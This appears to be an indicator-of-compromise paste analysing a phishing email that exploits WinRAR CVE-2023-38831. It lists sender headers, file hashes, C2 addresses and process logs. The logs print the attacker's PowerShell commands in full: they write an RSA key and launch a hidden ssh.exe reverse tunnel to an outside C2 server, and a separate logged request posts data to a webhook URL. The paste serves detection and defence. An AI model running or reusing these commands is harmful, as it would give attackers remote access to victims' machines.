VRad

#rar_explot_110923

  1. #IOC #OptiData #VR #RAR #202338831 #SSH #CMD #Powershell
  2.  
  3. https://pastebin.com/2FvjfiEs
  4.  
  5. previous_contact:
  6. https://pastebin.com/APaRNDHd
  7.  
  8. FAQ:
  9. https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164/
  10.  
  11.  
  12. attack_vector
  13. --------------
  14. email attach .RAR (exploit) > .pdf .cmd > powershell > ssh > exfil
  15.  
  16.  
  17. # # # # # # # #
  18. email_headers
  19. # # # # # # # #
  20. Received: from 185_ .158_ .164_ .73
  21. Received: from 185_ .195_ .19_ .196
  22. From: jie_ .lin_ .wang_ @feber_ -co_ .com
  23. Date: Mon, 11 Sep 2023 10:02:53 +0300
  24. Subject: Updated: Нові індикатори кіберзагроз
  25.  
  26.  
  27. # # # # # # # #
  28. files
  29. # # # # # # # #
  30. SHA-256 072afea7cae714b44c24c16308da0ef0e5aab36b7a601b310d12f8b925f359e7
  31. File name IOC_09_11.rar [ WinRAR CVE-2023-38831 ]
  32. File size 234.38 KB (240000 bytes)
  33.  
  34. SHA-256 91dec1160f3185cec4cb70fee0037ce3a62497e830330e9ddc2898f45682f63a
  35. File name IOC_09_11.pdf .cmd
  36. File size 6.74 KB (6901 bytes)
  37.  
  38. SHA-256 b747ed6421e7c3b4552096d7b4056d5472b2dbf81195a1143b51561520b859f6
  39. File name IOC_09_11.pdf
  40. File size 261.03 KB (267296 bytes)
  41.  
  42.  
  43. # # # # # # # #
  44. activity
  45. # # # # # # # #
  46.  
  47. PL_SCR email_attach
  48.  
  49. C2 46.4.105{ .116
  50. 216.66.35{ .145
  51.  
  52.  
  53. netwrk
  54. --------------
  55. 216.66.35{ .145 443 TCP 49301 → 443 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1
  56.  
  57. 46.4.105{ .116 webhook{ .site 80 HTTP POST /e2831741-d8c8-4971-9464-e52d34f9d611 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
  58.  
  59.  
  60. comp
  61. --------------
  62. ssh.exe 1316 TCP 216.66.35{ .145 443 ESTABLISHED
  63.  
  64.  
  65. proc
  66. --------------
  67. C:\Program Files\WinRAR\WinRAR.exe
  68. C:\Windows\system32\cmd.exe /c ""C:\Users\support\AppData\Local\Temp\Rar$DIa3472.25027\IOC_09_11.pdf .cmd" "
  69. C:\Program Files\WinRAR\WinRAR.exe e -ibck "IOC_09_11.rar" *.* C:\Users\support\AppData\Local\Temp\
  70.  
  71. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "Set-Content -Path \"$($env:LOCALAPPDATA)\\Temp\\rsakey\" -Value \"-----BEGIN RSA ....
  72.  
  73. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$port=get-random -Minimum 10760 -Maximum 11290;start-process ssh.exe -windowstyle Hidden -ArgumentList \"-N -p443 root@216.66.35{ .145 -R 216.66.35{ .145:$port -i $($env:LOCALAPPDATA)\\Temp\\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no\" -PassThru"
  74.  
  75. C:\Program Files (x86)\OpenSSH\ssh.exe -N -p443 root@216.66.35{ .145 -R 216.66.35{ .145:11146 -i C:\Users\support\AppData\Local\\Temp\\rsakey -oPubkeyAcceptedKeyTypes=ssh-rsa -oStrictHostKeyChecking=no
  76. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand ...
  77.  
  78. C:\Windows\system32\timeout.exe 3
  79.  
  80.  
  81. persist
  82. --------------
  83. n/a
  84.  
  85.  
  86. drop
  87. --------------
  88. %temp%\Rar$DIa3472.25027\IOC_09_11.pdf
  89. %temp%\Rar$DIa3472.25027\IOC_09_11.pdf .cmd
  90. C:\Users\support\.ssh\known_hosts
  91. %temp%\rsakey
  92.  
  93.  
  94. # # # # # # # #
  95. additional info
  96. # # # # # # # #
  97.  
  98.  
  99. # # # # # # # #
  100. VT & Intezer
  101. # # # # # # # #
  102. https://www.virustotal.com/gui/file/072afea7cae714b44c24c16308da0ef0e5aab36b7a601b310d12f8b925f359e7/details
  103. https://www.virustotal.com/gui/file/91dec1160f3185cec4cb70fee0037ce3a62497e830330e9ddc2898f45682f63a/details
  104. https://analyze.intezer.com/analyses/f32a47c7-333b-4b4e-9b69-14ea0378c083
  105. https://www.virustotal.com/gui/file/b747ed6421e7c3b4552096d7b4056d5472b2dbf81195a1143b51561520b859f6/details
  106.  
  107. VR